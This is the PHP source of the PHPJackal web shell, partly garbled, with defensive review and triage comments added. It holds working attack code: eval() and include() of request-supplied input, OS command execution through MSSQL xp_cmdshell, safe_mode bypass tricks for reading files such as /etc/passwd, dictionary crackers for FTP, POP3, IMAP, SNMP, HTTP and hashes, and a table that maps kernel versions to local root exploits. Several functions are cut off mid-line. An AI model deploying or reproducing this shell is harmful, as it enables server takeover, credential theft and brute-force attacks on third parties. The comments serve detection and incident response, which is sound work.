value='".hlinK("seC=checksum&filE=$fn&workingdiR=$cwd")."'>ChecksumCopyMoveRemove";$mdate=date('Y/m/d H:i:s',filemtime($fn));$adate=date('Y/m/d H:i:s',fileatime($fn));if($owner)$own="".$owner['name'].'';$size=showsizE(filesize($fn));if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}if(is_writeable($fn))echo $tdw;elseif(!is_readable($fn))echo $tdnr;else echo $cl2;echo "";if(strlen($fn)>45)echo substr($fn,0,42).'...';else echo $fn;echo '';echo $cl1."$own";echo $cl1."$mdate";echo $cl1."$adate";echo "$cl1";echo "";if(is_readable($fn))echo "R";if(is_writeable($fn))echo "W";if(is_ex
ecutable($fn))echo "X";if(is_uploaded_file($fn))echo "U";echo "";echo "$cl1$size";echo $cl2.$fileaction;echo '';}foreach($link as $ln){$own='Unknow';$i++;$owner=posix_getpwuid(fileowner($ln));$linkaction=$select.hlinK("seC=openit&namE=$ln&workingdiR=$ln")."'>OpenEditDownloadHex viewImageIncludeChecksumCopyMoveRenameRemove";$mdate=date('Y/m/d H:i:s',filemtime($ln));$adate=date('Y/m/d H:i:s',fileatime($ln));if($owner)$own="".$owner['name'].'';echo '';
$size=showsizE(filesize($ln));if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}if(is_writeable($ln))echo $tdw;elseif(!is_readable($ln))echo $tdnr;else echo $cl2;echo "";if(strlen($ln)>45)echo substr($ln,0,42).'...';else echo $ln;echo '';echo $cl1."$own";echo $cl1."$mdate";echo $cl1."$adate";echo "${cl1}";echo "L";if(is_readable($ln))echo "R";if (is_writeable($ln))echo "W";if(is_executable($ln))echo "X";echo "";echo "$cl1$size";
echo $cl2.$linkaction;echo '';}
}$dc=count($dir)-2;if($dc==-2)$dc=0;$fc=count($file);$lc=count($link);$total=$dc+$fc+$lc;$min=min(substr(ini_get('upload_max_filesize'),0,strpos(ini_get('post_max_size')
,'M')),substr(ini_get('post_max_size'),0,strpos(ini_get('post_max_size'),'M'))).'
MB';echo "$tableFind:Regular expressions $hcwd$hcwdDisplay files
and directories in current folderFind writable files and
directories in current folderFindwritable files in current
folderFind writable directories in current folderDisplay all files
in current folderDisplay all directories in current folder$et
Summery: Total: $total Directories: $dc Files: $fc Links:
$lc$et$td1n$td2m$hcwd$td1n Note: Max allowed file size to upload on
thisserver is $min$et$et";}}function
imapchecK($host,$username,$password,$timeout){$sock=fsockopen($host,143,$n,$s,$timeout);$b=uniqid('NJ');$l=strlen($b);if(!$sock)return
-1;fread($sock,1024);fputs($sock,"$b LOGIN $username
$password\r\n");$res=fgets($sock,$l+4);
fclose($sock);if($res=="$b OK")return 1;else return 0;}function ftpchecK($host,$username,$password,$timeout){$ftp=ftp_connect($host,21,$timeout);if(!$ftp)return -1;$con=ftp_login($ftp,$username,$password);if($con)return 1;else return 0;}function pop3checK($server,$user,$pass,$timeout){$sock=fsockopen($server,110,$en,$es,$timeout);if(!$sock)return -1;fread($sock,1024);
fwrite($sock,"user $user\n");$r=fgets($sock);if($r{0}=='-')return 0;
fwrite($sock,"pass $pass\n");$r=fgets($sock);fclose($sock);if($r{0}=='+')return 1;return 0;}function formcrackeR(){
global $errorbox,$footer,$et,$hcwd;if(!empty($_REQUEST['start'])){if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;$url=$_REQUEST['target'];$uf=$_REQUEST['userf'];$pf=$_REQUEST['passf'];$sf=$_REQUEST['submitf'];$sv=$_REQUEST['submitv'];$method=$_REQUEST['method'];$fail=$_REQUEST['fail'];$dic=$_REQUEST['dictionary'];
$type=$_REQUEST['combo'];$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:'';if(!file_exists($dic))die("$errorbox
Can not open
dictionary.$et$footer");$dictionary=fopen($dic,'r');echo 'Cracking
started...
';while(!feof($dictionary)){if($type){$combo=trim(fgets($dictionary),"
\n\r");$user=substr($combo,0,strpos($combo,':'));$pass=substr($combo,strpos($combo,':')+1);}else{$pass=trim(fgets($dictionary),"
\n\r");}
$url.="?$uf=$user&$pf=$pass&$sf=$sv";$res=check_urL($url,$method,$fail,12);if(!$res){echo
"U: $user P: $pass
";if($log)file_add_contentS($file,"U: $user P:
$pass\r\n");if(!$type)break;}}fclose($dictionary);echo 'Done!
';}else echo "HTTP Form cracker:Dictionary:Dictionary type:Simple
(P)Combo (U:P)Username:$hcwdAction Page:Method:POSTGETUsername
field name:Password field name:
4' bgcolor='#808080'>Submit name:Submit value:Fail string:Log $et";}function hashcrackeR(){global $errorbox,$t,$et,$hcwd;if(!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;$dictionary=fopen($_REQUEST['dictionary'],'r');
if($dictionary){$hash=strtoupper($_REQUEST['hash']);echo
'Cracking '.htmlspecialchars($hash).'...
';$type=($_REQUEST['type']=='MD5')?'md5':'sha1';while(!feof($dictionary)){$word=trim(fgets($dictionary),"
\n\r");if($hash==strtoupper(($type($word)))){echo "The answer is
$word
";if($log)file_add_contentS($file,"$x\r\n");break;}}echo
'Done!';fclose($dictionary);}else{
echo "$errorbox Can not open dictionary.$et";}}echo "${t}Hash cracker:Dictionary:Hash:Type:MD5SHA1L
og $hcwd $et";}function pr0xy(){global $errorbox,$et,$footer,$hcwd;echo "Navigator: $hcwd$et";if(!empty($_REQUEST['urL'])){
$u=parse_url($_REQUEST['urL']);$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$dir=dirname($file);
$con=getiT($_REQUEST['urL']);$s=array("href=mailto"=>"HrEf=mailto","HREF=mailto"=>"HrEf=mailto","href='mailto"=>"HrEf=\"mailto","HREF=\"mailto"=>"HrEf=\"mailto","href=\'mailto"=>"HrEf=\"mailto","HREF=\'mailto"=>"HrEf=\"mailto","href=\"http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"href=\'http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"HREF=\'http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"href=http"=>"HrEf=".hlinK("seC=px&urL=http"),"HREF=http"=>"HrEf=".hlinK("seC=px&urL=http"),"href=\""=>"HrEf=\"".hlinK("seC=px&urL=h
ttp://$host/$dir/"),"HREF=\""=>"HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),"href=\""=>"HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),'HREF="'=>'HrEf="'.hlinK("seC=px&urL=http://$host/$dir/"),"href="=>"HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),"HREF="=>"HrEf=".hlinK("seC=px&urL=http://$host/$dir/"));$con=replace_stR($s,$con);echo $con;}}function sqlclienT(){global $t,$errorbox,$et,$hcwd;if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){
$server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY'];$db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB'];$res=querY($type,$server,$user,$pass,$db,$query);if($res){$res=str_replace('-----','',$res);$res=str_replace('+++++','',$res);$r=explode('[+][+][+]',$res);$r[1]=str_replace('[-][-][-]',"",$r[1]);echo
"".$r[1].''.$r[0]."$et
";}else{
echo "$errorbox Failed!$et
";}}if(empty($_REQUEST['typE']))$_REQUEST['typE']='';echo "${t}SQL
cilent:MySQLMSSQLOraclePostgreSQLServer:Username:Password:Database:Query:";if
(!empty($_REQUEST['querY'])) echo
htmlspecialchars(($_REQUEST['querY']));else echo 'SHOW DATABASES';
echo "$hcwd
class=buttons type=submit value='Submit Query'>$et";}function querY($type,$host,$user,$pass,$db='',$query){$res='';switch($type){case 'MySQL':if(!function_exists('mysql_connect'))return 0;
$link=mysql_connect($host,$user,$pass);if($link){if(!empty($db))mysql_select_db($db,$link);$result=mysql_query($query,$link);while($data=mysql_fetch_row($result))$res.=implode('-----',$data).'+++++';$res.='[+][+][+]';for($i=0;$i
return $res;}break;}return 0;}function phpevaL(){
// phpevaL(): renders the "Evaler" form and, when the `code` request parameter is non-empty,
// passes it through replace_stR() and then to eval().
// NOTE(review): eval() here runs request-supplied text as PHP. The replacement map as shown in
// this listing (array(''=>'')) filters nothing — it may have lost content in extraction — and
// htmlspecialchars() escapes only eval()'s return value, not any output or side effects of the
// evaluated code. No authentication check is visible in this function.
global $t,$hcwd,$et;echo
'';if(!empty($_REQUEST['code'])){$s=array(''=>'');echo "";echo
htmlspecialchars(eval(replace_stR($s,$_REQUEST['code'])));echo
'
';}echo "${t}Evaler:Codes:";if(!empty($_REQUEST['code']))echo
htmlspecialchars($_REQUEST['code']);echo "$hcwd$et";}function
rootxpL(){$v=php_uname();$db=array('2.6.17'=>'prctl3,
raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh,raptor,
raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2,
h00lyshit','2.6.14'=>'raptor, raptor2,
h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh,
prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3,
krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24,
exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3,
h00lyshit','2.6.8'=>'h00lyshit, krad,
krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit,
krad, krad2','2.6.2'=>'h00lyshit, krad,
mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod,
ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24,
smpracer','2.4.27'=>'
elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace,uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx,kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace');foreach($db as $k=>$x)if(strstr($v,$k))return $x;return 0;}
/*
 * toolS(): three request-selected network and file actions, then the forms.
 *
 *   serveR + domaiN  Opens a TCP connection to the request-supplied host on
 *                    port 43 (5 second connect timeout), writes domaiN
 *                    followed by CRLF and echoes the reply as received. The
 *                    fsockopen() result is not checked before use.
 *   urL              parse_url() on the request value, then a connection to
 *                    the parsed host and port (80 when no port is given).
 *   ouT + uN + pW    Handled further down in this function: writes
 *                    .htpasswd and .htaccess files.
 *
 * Triage: the first two branches make the web server process open outbound
 * connections to a host and port chosen by the requester, which egress
 * filtering and connection logging on the web host would show.
 */
function toolS(){global $t,$hcwd,$et,$cwd;if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['domaiN'])){$ser=fsockopen($_REQUEST['serveR'],43,$en,$es,5);fputs($ser,$_REQUEST['domaiN']."\r\n");echo '';while(!feof($ser))echo fgets($ser,1024);echo '';fclose($ser);}elseif(!empty($_REQUEST['urL'])){$h='';$u=parse_url($_REQUEST['urL']);
$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$port=(empty($u['port']))?80:$u['port'];$ser=fsockopen($host,$port,$en,$es,5);
/*
 * Continuation of toolS(), `urL` branch: once the socket is open, a GET for
 * the parsed path is written and response lines are echoed, unescaped, until
 * a line consisting only of CRLF is read.
 */
if($ser){fputs($ser,"GET $file\r\nHost: $host\r\n\r\n");echo '';while($h!="\r\n"){$h=fgets($ser,1024);echo $h;}echo '';fclose($ser);}
/*
 * `ouT` + `uN` + `pW` branch: writes two files into the request-supplied
 * directory `ouT`, replacing whatever is there. `.htpasswd` receives
 * "<uN>:" followed by crypt() of the trimmed `pW`, with the constant
 * CRYPT_STD_DES passed in the salt position. `.htaccess` receives a Basic
 * auth block (AuthName "Secure") that points at that password file.
 *
 * Triage: creation or modification of .htaccess or .htpasswd by the web
 * server account is worth alerting on. A directory locked this way may have
 * been claimed by whoever ran this branch.
 */
}elseif(!empty($_REQUEST['ouT']) &&
isset($_REQUEST['pW'])&&
!empty($_REQUEST['uN'])){$htpasswd=$_REQUEST['ouT'].DIRECTORY_SEPARATOR.'.htpasswd';$htaccess=$_REQUEST['ouT'].DIRECTORY_SEPARATOR.'.htaccess';file_put_contents($htpasswd,$_REQUEST['uN'].':'.crypt(trim($_REQUEST['pW']),CRYPT_STD_DES));file_put_contents($htaccess,"AuthName
\"Secure\"\r\nAuthType Basic\r\nAuthUserFile $htpasswd\r\nRequire
valid-user\r\n");echo 'Done';}$s="";echo
"${t}WhoIs:${s}Server:domain:$hcwd$et
${t}.ht* generator:${s}Username:Password:Directory:$hcwd$et
${t}Grab header:${s}URL:$hcwd$et
";}
/*
 * hexvieW(): the next line opens the request-supplied path `filE` for
 * reading; the remainder of the body is truncated in this copy.
 */
function hexvieW(){
if(!empty($_REQUEST['filE'])){$f=$_REQUEST['filE'];echo "OffsetHexASCII";$file=fopen($f,'r');$i=-1;while(!feof($file)){$ln='';$i++;echo "";echo str_repeat('0',(8-strlen($i*16))).$i*16;echo '';echo "
echo "'>";for($j=0;$j
echo "$pr$i:(mb_send_mail$po";if(file_exists('/tmp/mb_send_mail'))unlink('/tmp/mb_send_mail');mb_send_mail(NULL, NULL, NULL, NULL,'-C $file -X /tmp/mb_send_mail');readfile('/tmp/mb_send_mail');$i++;}if(function_exists('curl_init')){
echo "$pr$i:(curl_init [A]$po";$fh=curl_init('file://'.$file.'');$tmp=curl_exec($fh);echo $tmp;$i++;echo "$pr$i:(curl_init [B]$po";$i++;if(strstr($file,DIRECTORY_SEPARATOR))$ch=curl_init('file:///'.$file."\x00/../../../../../../../../../../../../".__FILE__);else $ch=curl_init('file://'.$file."\x00".__FILE__);var_dump(curl_exec($ch));}
if(is_writable('.')){echo "$pr$i:(php.ini$po";file_put_contents('php.ini','safe_mode = Off');readfile($file);unlink('php.ini');$i++;}if(extension_loaded('perl')){echo "$pr$i:(perl$po";echo perlshelL("type \"$file\"");$i++;}if(is_object($ws=new COM('WScript.Shell'))){
echo "$pr$i:(COM$po";echo comshelL("type \"$file\"",$ws);$i++;}if(extension_loaded('ffi') && $windows){echo "$pr$i:(FFI$po";echo ffishelL("type \"$file\"");$i++;}if(checkfunctioN('win_shell_execute')){echo "$pr$i:(win32std$po";echo winshelL("type \"$file\"");
$i++;}if(checkfunctioN('win32_create_service')){echo "$pr$i:(win32service$po";echo srvshelL("type \"$file\"");$i++;}if(function_exists('imap_open')){echo "$pr$i:(imap [A]$po";$str=imap_open('/etc/passwd','','');$list=imap_list($str,$file,'*');for($i=0;$i
$tmp=imap_body($str,1);echo $tmp;imap_close($str);$i++;}if($file=='/etc/passwd'){echo "$pr$i:(posix$po";
for($uid=0;$uid1)$list=imap_list($str,trim($s[0]),trim($s[1]));else $list=imap_list($str,trim($str[0]),'*');for($i=0;$i
echo '';}
/*
 * Branch of a function whose header is not present in this copy.
 *
 * With serveR, coM, dB, useR and pasS in the request it logs in to the named
 * MSSQL server with the supplied credentials and selects database `dB`. It
 * creates a scratch table named by uniqid('NJ'), so the name starts with
 * "NJ", and fills it with the output of master.dbo.xp_cmdshell run on the
 * request value `coM`. The rows are then read back, the table is dropped and
 * the collected text is echoed without escaping. `coM` is concatenated into
 * the SQL text as-is.
 *
 * Triage on the database side: look for xp_cmdshell being enabled or invoked
 * and for short-lived tables whose names begin with "NJ". Keeping
 * xp_cmdshell disabled and application logins out of the sysadmin role
 * removes this path.
 */
elseif(!empty($_REQUEST['serveR']) && !empty($_REQUEST['coM']) && !empty($_REQUEST['dB']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS'])){$res='';$tb=uniqid('NJ');$db=mssql_connect($_REQUEST['serveR'],$_REQUEST['useR'],$_REQUEST['pasS']);
mssql_select_db($_REQUEST['dB'],$db);mssql_query("create table
$tb ( string VARCHAR (500) NULL)",$db);mssql_query("insert into $tb
EXEC master.dbo.xp_cmdshell
'".$_REQUEST['coM']."'",$db);$re=mssql_query("select * from
$tb",$db);while(($row=mssql_fetch_row($re))){$res.=
$row[0]."\r\n";}mssql_query("drop table
$tb",$db);mssql_close($db);echo "$res
";
/*
 * End of the preceding function: form defaults are taken from the request
 * (HTML-escaped) or fall back to '/etc/passwd', 'root', '123456' and 'test',
 * then the three forms are printed.
 */
}$f=(!empty($_REQUEST['file']))?htmlspecialchars($_REQUEST['file']):'/etc/passwd';$u=(!empty($_REQUEST['user']))?htmlspecialchars($_REQUEST['user']):'root';$p=(!empty($_REQUEST['pass']))?htmlspecialchars($_REQUEST['pass']):'123456';$d=(!empty($_REQUEST['db']))?htmlspecialchars($_REQUEST['db']):'test';echo
"${t}Use PHP Bugs:File:$hcwd$et
${t}Use MySQL:File:Username:Password:Database:$hcwd$et
${t}MSSQL
Exec:Server:Username:Password:Command:Database:$hcwd$et";}
/*
 * crackeR(): dictionary-driven credential guessing against a remote service.
 *
 * $check is 1 only when both `dictionary` and `target` are present.
 *   cracK without both      prints the $crack form for the chosen protocol.
 *   cracK with both         builds a function name from
 *                           strtolower(cracK) . 'checK' and calls it once per
 *                           dictionary line as $pro($target,$user,$pass,5).
 *                           With `combo` set, each line is split at ':' into
 *                           user and password. A return of -1 stops with a
 *                           connection error. A truthy return prints
 *                           "U: .. P: .." and, when `loG` and `logfilE` are
 *                           set, appends it to that file. In non-combo mode
 *                           the loop stops at the first hit.
 *   neither                 prints the protocol menu.
 *
 * NOTE(review): the callee name comes from the request, so which function
 * runs depends on which *checK functions exist in the full file. The
 * meaning of the trailing 5 is not visible here.
 *
 * Triage: the web host becomes the source of repeated login attempts against
 * `target`, so bursts of authentication failures from the web server's
 * address are the network-side signal.
 */
function
crackeR(){
global $errorbox,$t,$et,$crack,$cwd;$check=(!empty($_REQUEST['dictionary']) && !empty($_REQUEST['target']))?1:0;if(!empty($_REQUEST['cracK']) && !$check){
$c=htmlspecialchars($_REQUEST['cracK']);echo "$t$c cracker:$crack";}elseif(!empty($_REQUEST['cracK']) && $check){$pro=strtolower($_REQUEST['cracK']).'checK';$target=$_REQUEST['target'];$type=$_REQUEST['combo'];
$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:'';$dictionary=fopen($_REQUEST['dictionary'],'r');if(isset($_REQUEST['loG'])&&
!empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else
$log=0;if($dictionary){echo 'Cracking
'.htmlspecialchars($target).'...
';while(!feof($dictionary)){if($type){$combo=trim(fgets($dictionary),"
\n\r");$user=substr($combo,0,strpos($combo,':'));$pass=substr($combo,strpos($combo,':')+1);}else{
$pass=trim(fgets($dictionary),"
\n\r");}$ret=$pro($target,$user,$pass,5);if($ret==-1){echo
"$errorbox Can not connect to
server.$et";break;}else{if($ret){$x="U: $user P: $pass";echo
"$x
";if($log)file_add_contentS($file,"$x\r\n");if(!$type)break;}}}echo
'
Done';fclose($dictionary);}else{echo "$errorbox Can not open
dictionary.$et";}
/* Final branch of crackeR(): no protocol chosen, so the menu is printed. */
}else{echo "[Hash] - [SMTP] - [POP3] - [IMAP]- [FTP] - [SNMP] -
[MySQL] - [MSSQL] - [HTTP Form] - [HTTP Auth(basic)] - [Dictionary
maker]$et";}}
/*
 * snmpcrackeR(): tries each line of a dictionary file against one target.
 *
 * Needs `target` and `dictionary` in the request; otherwise the form is
 * printed. Each line of the dictionary file is trimmed and passed to
 * snmpchecK($target,$com,2), which is defined outside this excerpt. Every
 * value for which the call returns a truthy result is echoed unescaped and,
 * when `loG` and `logfilE` are set, appended to that file.
 *
 * NOTE(review): $com is presumably an SNMP community string and the final
 * argument 2 presumably a timeout; neither is confirmed by the visible code.
 *
 * Triage: if so, this would appear as a run of SNMP requests from the web
 * host to `target` with varying community values. Restricting SNMP to
 * management addresses limits what such a run can reach.
 */
function snmpcrackeR(){global
$t,$et,$errorbox,$hcwd;if(!empty($_REQUEST['target']) &&
!empty($_REQUEST['dictionary'])){$target=$_REQUEST['target'];if(isset($_REQUEST['loG'])&&
!empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else
$log=0;$dictionary=fopen($_REQUEST['dictionary'],'r');if($dictionary){echo
'Cracking '.htmlspecialchars($target).'...
';while(!feof($dictionary)){
$com=trim(fgets($dictionary),"
\n\r");$res=snmpchecK($target,$com,2);if($res){echo "$com
";if($log)file_add_contentS($file,"$com\r\n");}
}echo '
Done';fclose($dictionary);}else{echo "$errorbox Can not open
dictionary.$et";}
}else echo "${t}SNMP cracker:$hcwdDictionary:Server:Log $et";}function dicmakeR(){
global $errorbox,$windows,$footer,$t,$et,$hcwd;$combo=(empty($_REQUEST['combo']))?0:1;if(!empty($_REQUEST['range'])&& !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){$min=$_REQUEST['min'];$max=$_REQUEST['max'];if($max
$user=trim(fgets($in)," \n\r");if(!strstr($user,':'))continue;$user=substr($user,0,(strpos($user,':')));if($combo)fwrite($output,$user.':'.$user."\n");else fwrite($output,$user."\n");}fclose($input);fclose($output);echo 'Done';
}}}else{$output=fopen($_REQUEST['output'],'w');if($output){while(!feof($input)){$user=trim(fgets($input)," \n\r");if(!strstr($user,':'))continue;$user=substr($user,0,(strpos($user,':')));if($combo)fwrite($output,$user.':'.$user."\n");else fwrite($output,$user."\n");}
fclose($input);fclose($output);echo 'Done';}else echo
$errorbox.' Unable to write data to
'.htmlspecialchars($_REQUEST['input'])."$et
";}}elseif(!empty($_REQUEST['url']) &&
!empty($_REQUEST['output'])){$res=downloadiT($_REQUEST['url'],$_REQUEST['output']);if($combo
&&
$res){$file=file($_REQUEST['output']);$output=fopen($_REQUEST['output'],'w');foreach($file
as $v)fwrite($output,"$v:$v\n");fclose($output);
}echo 'Done';}else{$temp=whereistmP().DIRECTORY_SEPARATOR;echo
"${t}Wordlist generator:Range:a-zA-Z0-9Min lenght:12345678910Max
lenght:23456789101112131415Output:Combo style output$hcwd$et
${t}Grab dictionary:Grab from:Output:
lue='$temp.dic' name=output size=35>Combo style
output$hcwd$et
${t}Download dictionary:URL:Output:Combo style
output$hcwd$et";}}function ftpclienT(){global
$t,$cwd,$hcwd,$errorbox,$et;$td="";if(!empty($_REQUEST['hosT'])
&& !empty($_REQUEST['useR']) &&
isset($_REQUEST['pa
sS']) && function_exists('ftp_connect')){$user=$_REQUEST['useR'];$pass=$_REQUEST['pasS'];$host=$_REQUEST['hosT'];$con=ftp_connect($_REQUEST['hosT'],21,10);if($con){$ftp=ftp_login($con,$user,$pass);if($ftp){if(!empty($_REQUEST['PWD']))ftp_chdir($con,$_REQUEST['PWD']);if(!empty($_REQUEST['filE'])){$file=$_REQUEST['filE'];$mode=(isset($_REQUEST['modE']))?FTP_BINARY:FTP_ASCII;if(isset($_REQUEST['geT']))ftp_get($con,$file,$file,$mode);elseif(isset($_REQUEST['puT']))ftp_put($con,$file,$file,$mode);elseif(isset($_REQUEST['rM'])){
ftp_rmdir($con,$file);ftp_delete($con,$file);}elseif(isset($_REQUEST['mD']))ftp_mkdir($con,$file);}$pwd=ftp_pwd($con);$dir=ftp_nlist($con,'');$d=opendir($cwd);echo
"${td}Server:${td}Client:$td$td$td";foreach($dir as $n)echo
"$n
";echo "$td";while($cdir=readdir($d))if($cdir!='.' &&
$cdir!='..')echo "$cdir
"; echo "${td}Name:Binary$td$et";}else echo "$errorbox Wrong
username or password$et";}else echo "$errorbox Can not connect to
server!$et";}
else{echo "${t}FTP cilent:Server:
'#666666'>Username:Password:$hcwd$et";
}}function calC(){global
$t,$et,$hcwd;$fu=array('-','md5','sha1','crc32','hex','ip2long','decbin','dechex','hexdec','bindec','long2ip','base64_encode','base64_decode','urldecode','urlencode','des','strrev');if(!empty($_REQUEST['input'])
&&
(in_array($_REQUEST['to'],$fu))){$to=$_REQUEST['to'];echo
"${t}Output:
";if($to=='hex')for($i=0;$i
$pass=trim(fgets($dictionary)," \n\r");}$so=fsockopen($host,80,$en,$es,5);if(!$so){echo "$errorbox Can not connect to host$et";break;}else{$packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$
pass");if($method=='POST')$packet.='Content-Type: application/x-www-form-urlencoded\r\nContent-Length: '.strlen($data);$packet.="\r\n\r\n";$packet.=$data;fputs($so,$packet);$res=substr(fgets($so),9,2);fclose($so);if($res=='20'){echo "U: $user P: $pass";if($log)file_add_contentS($file,"U:$user P: $pass\r\n");}}}
/* End of the preceding function, whose beginning is missing from this copy. */
echo 'Done!';}else echo "${t}HTTP Auth cracker:POSTGETDictionary:Dictionary type:Simple (P)Combo (U:P)Username:Server:Log $hcwd $et";}
/*
 * openiT($name): displays the contents of any file PHP can read.
 *
 * The extension after the last '.' is lower-cased. For php, php3, php4,
 * phps, phtml, phtm and inc the file is shown with highlight_file();
 * anything else is read with file_get_contents() and echoed HTML-escaped.
 * The dispatcher calls this with the request value `namE`.
 *
 * Triage: every file readable by the web server account was exposed to the
 * operator, including application config files holding credentials, so
 * treat those secrets as disclosed. Tight file permissions and open_basedir
 * narrow what a read primitive like this can reach.
 */
function openiT($name){$ext=strtolower(substr($name,strrpos($name,'.')+1));$src=array('php','php3','php4','phps','phtml','phtm','inc');if(in_array($ext,$src))highlight_file($name);else echo ''.htmlspecialchars(file_get_contents($name)).'';}
/*
 * opensesS($name): prints a Name / Type / Value table for a session file.
 *
 * The file is split on ';' and the first character of each serialized value
 * (i, s, b, f, a, o, n) is mapped to a type label.
 *
 * NOTE(review): the delimiter in explode('',$v) is empty in this copy, which
 * explode() rejects; the original character was probably lost in extraction.
 *
 * Triage: readable session files expose other users' session data, so the
 * session save path should not be world-readable.
 */
function opensesS($name){$sess=file_get_contents($name);$var=explode(';',$sess);echo "Name\tType\tValue\r\n";foreach($var as $v){$t=explode('',$v);$c=explode(':',$t[1]);$y='';if($c[0]=='i')$y='Integer';elseif($c[0]=='s')$y='String';elseif($c[0]=='b')$y='Boolean';elseif($c[0]=='f')$y='Float';elseif($c[0]=='a')$y='Array';elseif($c[0]=='o')$y='Object';elseif($c[0]=='n')$y='Null';
echo $t[0]."\t$y\t".$c[1]."\r\n";}echo '';
}
/*
 * logouT(): expires the cookie named `passw` by setting it empty with a
 * timestamp in the past, then redirects to the URL returned by hlinK(),
 * which is defined outside this excerpt.
 *
 * NOTE(review): `passw` is presumably the shell's own login cookie; the code
 * that sets and checks it is not in this excerpt. If so, requests carrying a
 * `passw` cookie are a useful search key in web server logs.
 */
function logouT(){setcookie('passw','',time()-10000);header('Location: '.hlinK());}?>
body{scrollbar-base-color: #484848; scrollbar-arrow-color: #FFFFFF; scrollbar-track-color: #969696;font-size:16px;font-family:"Arial Narrow";}Table {font-size: 15px;} .buttons{font-family:Verdana;font-size:10pt;font-weight:normal;font-style:normal;color:#FFFFFF;background-color:#555555;border-style:solid;border-width:1px;border-color:#FFFFFF;}textarea{border: 0px #000000 solid;background: #EEEEEE;color: #000000;}input{background: #EEEEEE;border-width:1px;border-style:solid;border-color:black}select{background: #EEEEEE; border: 0px #000000 none;}function HS(box){
if(document.getElementById(box).style.display!="none"){document.getElementById(box).style.display="none";document.getElementById('lk').innerHTML="+";}else{document.getElementById(box).style.display="";document.getElementById('lk').innerHTML="-";}}function chmoD($file){$ch=prompt("Changing file mode["+$file+"]: ex. 777","");if($ch != null)location.href=""+$file+"&modE="+$ch;
}PHPJackal [][Back] -
/*
 * Tail of the request dispatcher. The switch header, and therefore the
 * request parameter that selects the action, is missing from this copy.
 * Each case maps one action keyword to one handler; unknown keywords print
 * $intro, and $footer is printed last.
 *
 * Two cases act on request data in place rather than through a handler:
 *   'edit'  when `Save` is set, opens the request path `file` for writing
 *           and writes the request value `edited` into it.
 *   'inc'   when the request path `filE` exists, include()s it, which
 *           executes any PHP that file contains.
 *
 * NOTE(review): no access check is visible in these lines; whether one runs
 * earlier in the file cannot be told from here.
 *
 * Triage: the action keywords and the mixed-case parameter names (`filE`,
 * `namE`) give request patterns to search for in access and WAF logs.
 */
case 'fm':filemanageR();break;case 'sc':scanneR();break;case 'phpinfo':phpinfo();break;case 'edit':if(!empty($_REQUEST['open']))editoR($_REQUEST['filE']);if(!empty($_REQUEST['Save'])){$filehandle=fopen($_REQUEST['file'],'w');fwrite($filehandle,$_REQUEST['edited']);
fclose($filehandle);}if(!empty($_REQUEST['filE']))editoR($_REQUEST['filE']);else editoR('');break;case 'openit':openiT($_REQUEST['namE']);break;case 'cr':crackeR();break;case 'dic':dicmakeR();break;case 'tools':toolS();break;case 'hex':hexvieW();break;case 'img':showimagE($_REQUEST['filE']);break;case 'inc':if(file_exists($_REQUEST['filE']))include($_REQUEST['filE']);break;case 'hc':hashcrackeR();break;case 'fcr':formcrackeR();break;
